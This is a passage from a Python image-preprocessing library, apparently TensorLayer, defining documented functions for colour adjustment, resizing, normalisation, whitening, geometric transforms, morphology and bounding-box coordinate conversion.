im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb
# # contrast
# def constant(x, cutoff=0.5, gain=10, inv=False, is_random=False):
# # TODO
# x = exposure.adjust_sigmoid(x, cutoff=cutoff, gain=gain, inv=inv)
# return x
#
# def constant_multi():
# #TODO
# pass
def imresize(x, size=None, interp='bicubic', mode=None):
"""Resize an image by given output size and method.
Warning, this function will rescale the value to [0, 255].
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
size : list of 2 int or None
For height and width.
interp : str
Interpolation method for re-sizing (`nearest`, `lanczos`, `bilinear`, `bicubic` (default) or `cubic`).
mode : str
The PIL image mode (`P`, `L`, etc.) to convert arr before resizing.
Returns
-------
numpy.array
A processed image.
References
------------
- `scipy.misc.imresize <https://docs.scipy.org/doc/scipy/reference/generated/scipy.misc.imresize.html>`__
"""
if size is None:
size = [100, 100]
if x.shape[-1] == 1:
# greyscale
x = scipy.misc.imresize(x[:, :, 0], size, interp=interp, mode=mode)
return x[:, :, np.newaxis]
elif x.shape[-1] == 3:
# rgb, bgr ..
return scipy.misc.imresize(x, size, interp=interp, mode=mode)
else:
raise Exception("Unsupported channel %d" % x.shape[-1])
# value scale
def pixel_value_scale(im, val=0.9, clip=(-np.inf, np.inf), is_random=False):
"""Scales each value in the pixels of the image.
Parameters
-----------
im : numpy.array
An image.
val : float
The scale value for changing pixel value.
- If is_random=False, multiply this value with all pixels.
- If is_random=True, multiply a value between [1-val, 1+val] with all pixels.
clip : tuple of 2 numbers
The minimum and maximum value.
is_random : boolean
If True, see ``val``.
Returns
-------
numpy.array
A processed image.
Examples
----------
Random
>>> im = pixel_value_scale(im, 0.1, [0, 255], is_random=True)
Non-random
>>> im = pixel_value_scale(im, 0.9, [0, 255], is_random=False)
"""
if is_random:
scale = 1 + np.random.uniform(-val, val)
im = im * scale
else:
im = im * val
if len(clip) == 2:
im = np.clip(im, clip[0], clip[1])
else:
raise Exception("clip : tuple of 2 numbers")
return im
# normailization
def samplewise_norm(
x, rescale=None, samplewise_center=False, samplewise_std_normalization=False, channel_index=2, epsilon=1e-7
):
"""Normalize an image by rescale, samplewise centering and samplewise centering in order.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
rescale : float
Rescaling factor. If None or 0, no rescaling is applied, otherwise we multiply the data by the value provided (before applying any other transformation)
samplewise_center : boolean
If True, set each sample mean to 0.
samplewise_std_normalization : boolean
If True, divide each input by its std.
epsilon : float
A small position value for dividing standard deviation.
Returns
-------
numpy.array
A processed image.
Examples
--------
>>> x = samplewise_norm(x, samplewise_center=True, samplewise_std_normalization=True)
>>> print(x.shape, np.mean(x), np.std(x))
(160, 176, 1), 0.0, 1.0
Notes
------
When samplewise_center and samplewise_std_normalization are True.
- For greyscale image, every pixels are subtracted and divided by the mean and std of whole image.
- For RGB image, every pixels are subtracted and divided by the mean and std of this pixel i.e. the mean and std of a pixel is 0 and 1.
"""
if rescale:
x *= rescale
if x.shape[channel_index] == 1:
# greyscale
if samplewise_center:
x = x - np.mean(x)
if samplewise_std_normalization:
x = x / np.std(x)
return x
elif x.shape[channel_index] == 3:
# rgb
if samplewise_center:
x = x - np.mean(x, axis=channel_index, keepdims=True)
if samplewise_std_normalization:
x = x / (np.std(x, axis=channel_index, keepdims=True) + epsilon)
return x
else:
raise Exception("Unsupported channels %d" % x.shape[channel_index])
def featurewise_norm(x, mean=None, std=None, epsilon=1e-7):
"""Normalize every pixels by the same given mean and std, which are usually
compute from all examples.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
mean : float
Value for subtraction.
std : float
Value for division.
epsilon : float
A small position value for dividing standard deviation.
Returns
-------
numpy.array
A processed image.
"""
if mean:
x = x - mean
if std:
x = x / (std + epsilon)
return x
# whitening
def get_zca_whitening_principal_components_img(X):
"""Return the ZCA whitening principal components matrix.
Parameters
-----------
x : numpy.array
Batch of images with dimension of [n_example, row, col, channel] (default).
Returns
-------
numpy.array
A processed image.
"""
flatX = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[2] * X.shape[3]))
tl.logging.info("zca : computing sigma ..")
sigma = np.dot(flatX.T, flatX) / flatX.shape[0]
tl.logging.info("zca : computing U, S and V ..")
U, S, _ = linalg.svd(sigma) # USV
tl.logging.info("zca : computing principal components ..")
principal_components = np.dot(np.dot(U, np.diag(1. / np.sqrt(S + 10e-7))), U.T)
return principal_components
def zca_whitening(x, principal_components):
"""Apply ZCA whitening on an image by given principal components matrix.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
principal_components : matrix
Matrix from ``get_zca_whitening_principal_components_img``.
Returns
-------
numpy.array
A processed image.
"""
flatx = np.reshape(x, (x.size))
# tl.logging.info(principal_components.shape, x.shape) # ((28160, 28160), (160, 176, 1))
# flatx = np.reshape(x, (x.shape))
# flatx = np.reshape(x, (x.shape[0], ))
# tl.logging.info(flatx.shape) # (160, 176, 1)
whitex = np.dot(flatx, principal_components)
x = np.reshape(whitex, (x.shape[0], x.shape[1], x.shape[2]))
return x
# developing
# def barrel_transform(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
#
# def barrel_transform_multi(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
# channel shift
def channel_shift(x, intensity, is_random=False, channel_index=2):
"""Shift the channels of an image, randomly or non-randomly, see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
intensity : float
Intensity of shifting.
is_random : boolean
If True, randomly shift. Default is False.
channel_index : int
Index of channel. Default is 2.
Returns
-------
numpy.array
A processed image.
"""
if is_random:
factor = np.random.uniform(-intensity, intensity)
else:
factor = intensity
x = np.rollaxis(x, channel_index, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_index + 1)
return x
# x = np.rollaxis(x, channel_index, 0)
# min_x, max_x = np.min(x), np.max(x)
# channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
# for x_channel in x]
# x = np.stack(channel_images, axis=0)
# x = np.rollaxis(x, 0, channel_index+1)
# return x
def channel_shift_multi(x, intensity, is_random=False, channel_index=2):
"""Shift the channels of images with the same arguments, randomly or non-randomly, see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.channel_shift``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
factor = np.random.uniform(-intensity, intensity)
else:
factor = intensity
results = []
for data in x:
data = np.rollaxis(data, channel_index, 0)
min_x, max_x = np.min(data), np.max(data)
channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in x]
data = np.stack(channel_images, axis=0)
data = np.rollaxis(x, 0, channel_index + 1)
results.append(data)
return np.asarray(results)
# noise
def drop(x, keep=0.5):
"""Randomly set some pixels to zero by a given keeping probability.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] or [row, col].
keep : float
The keeping probability (0, 1), the lower more values will be set to zero.
Returns
-------
numpy.array
A processed image.
"""
if len(x.shape) == 3:
if x.shape[-1] == 3: # color
img_size = x.shape
mask = np.random.binomial(n=1, p=keep, size=x.shape[:-1])
for i in range(3):
x[:, :, i] = np.multiply(x[:, :, i], mask)
elif x.shape[-1] == 1: # greyscale image
img_size = x.shape
x = np.multiply(x, np.random.binomial(n=1, p=keep, size=img_size))
else:
raise Exception("Unsupported shape {}".format(x.shape))
elif len(x.shape) == 2 or 1: # greyscale matrix (image) or vector
img_size = x.shape
x = np.multiply(x, np.random.binomial(n=1, p=keep, size=img_size))
else:
raise Exception("Unsupported shape {}".format(x.shape))
return x
# x = np.asarray([[1,2,3,4,5,6,7,8,9,10],[1,2,3,4,5,6,7,8,9,10]])
# x = np.asarray([x,x,x,x,x,x])
# x.shape = 10, 4, 3
# tl.logging.info(x)
# # exit()
# tl.logging.info(x.shape)
# # exit()
# tl.logging.info(drop(x, keep=1.))
# exit()
# manual transform
def transform_matrix_offset_center(matrix, x, y):
"""Return transform matrix offset center.
Parameters
----------
matrix : numpy.array
Transform matrix.
x and y : 2 int
Size of image.
Returns
-------
numpy.array
The transform matrix.
Examples
--------
- See ``tl.prepro.rotation``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
"""
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
def apply_transform(x, transform_matrix, channel_index=2, fill_mode='nearest', cval=0., order=1):
"""Return transformed images by given ``transform_matrix`` from ``transform_matrix_offset_center``.
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
transform_matrix : numpy.array
Transform matrix (offset center), can be generated by ``transform_matrix_offset_center``
channel_index : int
Index of channel, default 2.
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0
order : int
The order of interpolation. The order has to be in the range 0-5:
- 0 Nearest-neighbor
- 1 Bi-linear (default)
- 2 Bi-quadratic
- 3 Bi-cubic
- 4 Bi-quartic
- 5 Bi-quintic
- `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
Examples
--------
- See ``tl.prepro.rotation``, ``tl.prepro.shift``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
"""
x = np.rollaxis(x, channel_index, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [
ndi.interpolation.affine_transform(
x_channel, final_affine_matrix, final_offset, order=order, mode=fill_mode, cval=cval
) for x_channel in x
]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_index + 1)
return x
def projective_transform_by_points(
x, src, dst, map_args=None, output_shape=None, order=1, mode='constant', cval=0.0, clip=True,
preserve_range=False
):
"""Projective transform by given coordinates, usually 4 coordinates.
see `scikit-image <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
src : list or numpy
The original coordinates, usually 4 coordinates of (width, height).
dst : list or numpy
The coordinates after transformation, the number of coordinates is the same with src.
map_args : dictionary or None
Keyword arguments passed to inverse map.
output_shape : tuple of 2 int
Shape of the output image generated. By default the shape of the input image is preserved. Note that, even for multi-band images, only rows and columns need to be specified.
order : int
The order of interpolation. The order has to be in the range 0-5:
- 0 Nearest-neighbor
- 1 Bi-linear (default)
- 2 Bi-quadratic
- 3 Bi-cubic
- 4 Bi-quartic
- 5 Bi-quintic
mode : str
One of `constant` (default), `edge`, `symmetric`, `reflect` or `wrap`.
Points outside the boundaries of the input are filled according to the given mode. Modes match the behaviour of numpy.pad.
cval : float
Used in conjunction with mode `constant`, the value outside the image boundaries.
clip : boolean
Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
preserve_range : boolean
Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.
Returns
-------
numpy.array
A processed image.
Examples
--------
Assume X is an image from CIFAR-10, i.e. shape == (32, 32, 3)
>>> src = [[0,0],[0,32],[32,0],[32,32]] # [w, h]
>>> dst = [[10,10],[0,32],[32,0],[32,32]]
>>> x = tl.prepro.projective_transform_by_points(X, src, dst)
References
-----------
- `scikit-image : geometric transformations <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__
- `scikit-image : examples <http://scikit-image.org/docs/dev/auto_examples/index.html>`__
"""
if map_args is None:
map_args = {}
# if type(src) is list:
if isinstance(src, list): # convert to numpy
src = np.array(src)
# if type(dst) is list:
if isinstance(dst, list):
dst = np.array(dst)
if np.max(x) > 1: # convert to [0, 1]
x = x / 255
m = transform.ProjectiveTransform()
m.estimate(dst, src)
warped = transform.warp(
x, m, map_args=map_args, output_shape=output_shape, order=order, mode=mode, cval=cval, clip=clip,
preserve_range=preserve_range
)
return warped
# Numpy and PIL
def array_to_img(x, dim_ordering=(0, 1, 2), scale=True):
"""Converts a numpy array to PIL image object (uint8 format).
Parameters
----------
x : numpy.array
An image with dimension of 3 and channels of 1 or 3.
dim_ordering : tuple of 3 int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
scale : boolean
If True, converts image to [0, 255] from any range of value like [-1, 2]. Default is True.
Returns
-------
PIL.image
An image.
References
-----------
`PIL Image.fromarray <http://pillow.readthedocs.io/en/3.1.x/reference/Image.html?highlight=fromarray>`__
"""
# if dim_ordering == 'default':
# dim_ordering = K.image_dim_ordering()
# if dim_ordering == 'th': # theano
# x = x.transpose(1, 2, 0)
x = x.transpose(dim_ordering)
if scale:
x += max(-np.min(x), 0)
x_max = np.max(x)
if x_max != 0:
# tl.logging.info(x_max)
# x /= x_max
x = x / x_max
x *= 255
if x.shape[2] == 3:
# RGB
return PIL.Image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
return PIL.Image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise Exception('Unsupported channel number: ', x.shape[2])
def find_contours(x, level=0.8, fully_connected='low', positive_orientation='low'):
"""Find iso-valued contours in a 2D array for a given level value, returns list of (n, 2)-ndarrays
see `skimage.measure.find_contours <http://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.find_contours>`__.
Parameters
------------
x : 2D ndarray of double.
Input data in which to find contours.
level : float
Value along which to find contours in the array.
fully_connected : str
Either `low` or `high`. Indicates whether array elements below the given level value are to be considered fully-connected (and hence elements above the value will only be face connected), or vice-versa. (See notes below for details.)
positive_orientation : str
Either `low` or `high`. Indicates whether the output contours will produce positively-oriented polygons around islands of low- or high-valued elements. If `low` then contours will wind counter-clockwise around elements below the iso-value. Alternately, this means that low-valued elements are always on the left of the contour.
Returns
--------
list of (n,2)-ndarrays
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
return skimage.measure.find_contours(
x, level, fully_connected=fully_connected, positive_orientation=positive_orientation
)
def pt2map(list_points=None, size=(100, 100), val=1):
"""Inputs a list of points, return a 2D image.
Parameters
--------------
list_points : list of 2 int
[[x, y], [x, y]..] for point coordinates.
size : tuple of 2 int
(w, h) for output size.
val : float or int
For the contour value.
Returns
-------
numpy.array
An image.
"""
if list_points is None:
raise Exception("list_points : list of 2 int")
i_m = np.zeros(size)
if len(list_points) == 0:
return i_m
for xx in list_points:
for x in xx:
# tl.logging.info(x)
i_m[int(np.round(x[0]))][int(np.round(x[1]))] = val
return i_m
def binary_dilation(x, radius=3):
"""Return fast binary morphological dilation of an image.
see `skimage.morphology.binary_dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_dilation>`__.
Parameters
-----------
x : 2D array
A binary image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed binary image.
"""
mask = disk(radius)
x = _binary_dilation(x, selem=mask)
return x
def dilation(x, radius=3):
"""Return greyscale morphological dilation of an image,
see `skimage.morphology.dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.dilation>`__.
Parameters
-----------
x : 2D array
An greyscale image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed greyscale image.
"""
mask = disk(radius)
x = dilation(x, selem=mask)
return x
def binary_erosion(x, radius=3):
"""Return binary morphological erosion of an image,
see `skimage.morphology.binary_erosion <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_erosion>`__.
Parameters
-----------
x : 2D array
A binary image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed binary image.
"""
mask = disk(radius)
x = _binary_erosion(x, selem=mask)
return x
def erosion(x, radius=3):
"""Return greyscale morphological erosion of an image,
see `skimage.morphology.erosion <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.erosion>`__.
Parameters
-----------
x : 2D array
A greyscale image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed greyscale image.
"""
mask = disk(radius)
x = _erosion(x, selem=mask)
return x
def obj_box_coords_rescale(coords=None, shape=None):
"""Scale down a list of coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].
Parameters
------------
coords : list of list of 4 ints or None
For coordinates of more than one images .e.g.[[x, y, w, h], [x, y, w, h], ...].
shape : list of 2 int or None
【height, width].
Returns
-------
list of list of 4 numbers
A list of new bounding boxes.
Examples
---------
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
>>> print(coords)
[[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
>>> print(coords)
[[0.3, 0.8, 0.5, 1.0]]
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
>>> print(coords)
[[0.15, 0.4, 0.25, 0.5]]
Returns
-------
list of 4 numbers
New coordinates.
"""
if coords is None:
coords = []
if shape is None:
shape = [100, 200]
imh, imw = shape[0], shape[1]
imh = imh * 1.0 # * 1.0 for python2 : force division to be float point
imw = imw * 1.0
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x = coord[0] / imw
y = coord[1] / imh
w = coord[2] / imw
h = coord[3] / imh
coords_new.append([x, y, w, h])
return coords_new
def obj_box_coord_rescale(coord=None, shape=None):
"""Scale down one coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].
It is the reverse process of ``obj_box_coord_scale_to_pixelunit``.
Parameters
------------
coords : list of 4 int or None
One coordinates of one image e.g. [x, y, w, h].
shape : list of 2 int or None
For [height, width].
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> coord = tl.prepro.obj_box_coord_rescale(coord=[30, 40, 50, 50], shape=[100, 100])
[0.3, 0.4, 0.5, 0.5]
"""
if coord is None:
coord = []
if shape is None:
shape = [100, 200]
return obj_box_coords_rescale(coords=[coord], shape=shape)[0]
def obj_box_coord_scale_to_pixelunit(coord, shape=None):
"""Convert one coordinate [x, y, w (or x2), h (or y2)] in ratio format to image coordinate format.
It is the reverse process of ``obj_box_coord_rescale``.
Parameters
-----------
coord : list of 4 float
One coordinate of one image [x, y, w (or x2), h (or y2)] in ratio format, i.e value range [0~1].
shape : tuple of 2 or None
For [height, width].
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> x, y, x2, y2 = tl.prepro.obj_box_coord_scale_to_pixelunit([0.2, 0.3, 0.5, 0.7], shape=(100, 200, 3))
[40, 30, 100, 70]
"""
if shape is None:
shape = [100, 100]
imh, imw = shape[0:2]
x = int(coord[0] * imw)
x2 = int(coord[2] * imw)
y = int(coord[1] * imh)
y2 = int(coord[3] * imh)
return [x, y, x2, y2]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
# tl.logging.info(coords)
# # [[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
# tl.logging.info(coords)
# # [[0.3, 0.8, 0.5, 1.0]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
# tl.logging.info(coords)
# # [[0.15, 0.4, 0.25, 0.5]]
# exit()
def obj_box_coord_centroid_to_upleft_butright(coord, to_int=False):
"""Convert one coordinate [x_center, y_center, w, h] to [x1, y1, x2, y2] in up-left and botton-right format.
Parameters
------------
coord : list of 4 int/float
One coordinate.
to_int : boolean
Whether to convert output as integer.
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
[20, 30, 40, 50]
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x_center, y_center, w, h = coord
x = x_center - w / 2.
y = y_center - h / 2.
x2 = x + w
y2 = y + h
if to_int:
return [int(x), int(y), int(x2), int(y2)]
else:
return [x, y, x2, y2]
# coord = obj_box_coord_centroid_to_upleft_butright([30, 40, 20, 20])
# tl.logging.info(coord) [20, 30, 40, 50]
# exit()
def obj_box_coord_upleft_butright_to_centroid(coord):
"""Convert one coordinate [x1, y1, x2, y2] to [x_center, y_center, w, h].
It is the reverse process of ``obj_box_coord_centroid_to_upleft_butright``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x1, y1, x2, y2]")
x1, y1, x2, y2 = coord
w = x2 - x1
h = y2 - y1
x_c = x1 + w / 2.
y_c = y1 + h / 2.
return [x_c, y_c, w, h]
def obj_box_coord_centroid_to_upleft(coord):
"""Convert one coordinate [x_center, y_center, w, h] to [x, y, w, h].
It is the reverse process of ``obj_box_coord_upleft_to_centroid``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x_center, y_center, w, h = coord
x = x_center - w / 2.
y = y_center - h / 2.
return [x, y, w, h]
def obj_box_coord_upleft_to_centroid(coord):
"""Convert one coordinate [x, y, w, h] to [x_center, y_center, w, h].
It is the reverse process of ``obj_box_coord_centroid_to_upleft``.
Parameters
------------
coord : list of 4 int/float
One coordinate.
Returns
-------
list of 4 numbers
New bounding box.
"""
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x, y, w, h = coord
x_center = x + w / 2.
y_center = y + h / 2.
return [x_center, y_center, w, h]
def parse_darknet_ann_str_to_list(annotations):
"""Input string format of class, x, y, w, h, return list of list format.
Parameters
-----------
annotations : str
The annotations in darkent format "class, x, y, w, h ...." seperated by "\\n".
Returns
-------
list of list of 4 numbers
List of bounding box.
"""
annotations = annotations.split("\n")
ann = []
for a in annotations:
a = a.split()
if len(a) == 5:
for i, _v in enumerate(a):
if i == 0:
a[i] = int(a[i])
else:
a[i] = float(a[i])
ann.append(a)
return ann
def parse_darknet_ann_list_to_cls_box(annotations):
"""Parse darknet annotation format into two lists for class and bounding box.
Input list of [[class, x, y, w, h], ...], return two list of [class ...] and [[x, y, w, h], ...].
Parameters
------------
annotations : list of list
A list of class and bounding boxes of images e.g. [[class, x, y, w, h], ...]
Returns
-------
list of int
List of class labels.
list of list of 4 numbers
List of bounding box.
"""
class_list = []
bbox_list = []
for ann in annotations:
class_list.append(ann[0])
bbox_list.append(ann[1:])
return class_list, bbox_list
def obj_box_horizontal_flip(im, coords=None, is_rescale=False, is_center=False, is_random=False):
"""Left-right flip the image and coordinates for object detection.
Parameters
----------
im : numpy.array
An image with dimension of [row, col, channel] (default).
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...].
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1]. Default is False.
is_center : boolean
Set to True, if the x and y of coordinates are the centroid (i.e. darknet format). Default is False.
is_random : boolean
If True, randomly flip. Default is False.
Returns
-------
numpy.array
A processed image
list of list of 4 numbers
A list of new bounding boxes.
Examples
--------
>>> im = np.zeros([80, 100]) # as an image with shape width=100, height=80
>>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
>>> print(coords)
[[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
>>> print(coords)
[[0.5, 0.4, 0.3, 0.3]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
>>> print(coords)
[[80, 40, 30, 30]]
>>> im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
>>> print(coords)
[[50, 40, 30, 30]]
"""
if coords is None:
coords = []
def _flip(im, coords):
im = flip_axis(im, axis=1, is_random=False)
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
if is_rescale:
if is_center:
# x_center' = 1 - x
x = 1. - coord[0]
else:
# x_center' = 1 - x - w
x = 1. - coord[0] - coord[2]
else:
if is_center:
# x' = im.width - x
x = im.shape[1] - coord[0]
else:
# x' = im.width - x - w
x = im.shape[1] - coord[0] - coord[2]
coords_new.append([x, coord[1], coord[2], coord[3]])
return im, coords_new
if is_random:
factor = np.random.uniform(-1, 1)
if factor > 0:
return _flip(im, coords)
else:
return im, coords
else:
return _flip(im, coords)
obj_box_left_right_flip = obj_box_horizontal_flip
# im = np.zeros([80, 100]) # as an image with shape width=100, height=80
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3], [0.1, 0.5, 0.2, 0.3]], is_rescale=True, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[0.8, 0.4, 0.3, 0.3], [0.9, 0.5, 0.2, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[0.2, 0.4, 0.3, 0.3]], is_rescale=True, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[0.5, 0.4, 0.3, 0.3]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=True, is_random=False)
# tl.logging.info(coords)
# # [[80, 40, 30, 30]]
# im, coords = obj_box_left_right_flip(im, coords=[[20, 40, 30, 30]], is_rescale=False, is_center=False, is_random=False)
# tl.logging.info(coords)
# # [[50, 40, 30, 30]]
# exit()
def obj_box_imresize(im, coords=None, size=None, interp='bicubic', mode=None, is_rescale=False):
"""Resize an image, and compute the new bounding box coordinates.
Parameters
-------------
im : numpy.array
An image with dimension of [row, col, channel] (default).
coords : list of list of 4 int/float or None
Coordinates [[x, y, w, h], [x, y, w, h], ...]
size interp and mode : args
See ``tl.prepro.imresize``.
is_rescale : boolean
Set to True, if the input coordinates are rescaled to [0, 1], then return the original coordinates. Default is False.
Returns
-------
numpy.array
A processed image
list of list of 4 numbers
A list of new bounding boxes.
Examples
--------
>>> im = np.zeros([80, 100, 3]) # as an image with shape width=100, height=80
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30], [10, 20, 20, 20]], size=[160, 200], is_rescale=False)
>>> print(coords)
[[40, 80, 60, 60], [20, 40, 40, 40]]
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[40, 100], is_rescale=False)
>>> print(coords)
[[20, 20, 30, 15]]
>>> _, coords = obj_box_imresize(im, coords=[[20, 40, 30, 30]], size=[60, 150], is_rescale=False)
>>> print(coords)
[[30, 30, 45, 22]]
>>> im2, coords = obj_box_imresize(im, coords=[[0.2, 0.4, 0.3, 0.3]], size=[160, 200], is_rescale=True)
>>> print(coords, im2.shape)
[[0.2, 0.4, 0.3, 0.3]] (160, 200, 3)
"""
if coords is None:
coords = []
if size is None:
size = [100, 100]
imh, imw = im.shape[0:2]
imh = imh * 1.0 # * 1.0 for python2 : force division to be float point
imw = imw * 1.0
im = imresize(im, size=size, interp=interp, mode=mode)
if is_rescale is False:
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
# x' = x * (imw'/imw)
x = int(coord[0] * (size[1] / imw))
# y' = y * (imh'/imh)
# tl.logging.info('>>', coord[1], size[0], imh)
y = int(coord[1] * (size[0] / imh))
# w' = w * (imw'/imw)
w = int(coord[2] * (size[1] / imw))
# h' = h * (imh'/imh)
h = int(coord[3] * (size[0] / imh))
coords_new.append([x, y, w, h])
return im, coords_new
else:
return im, coords
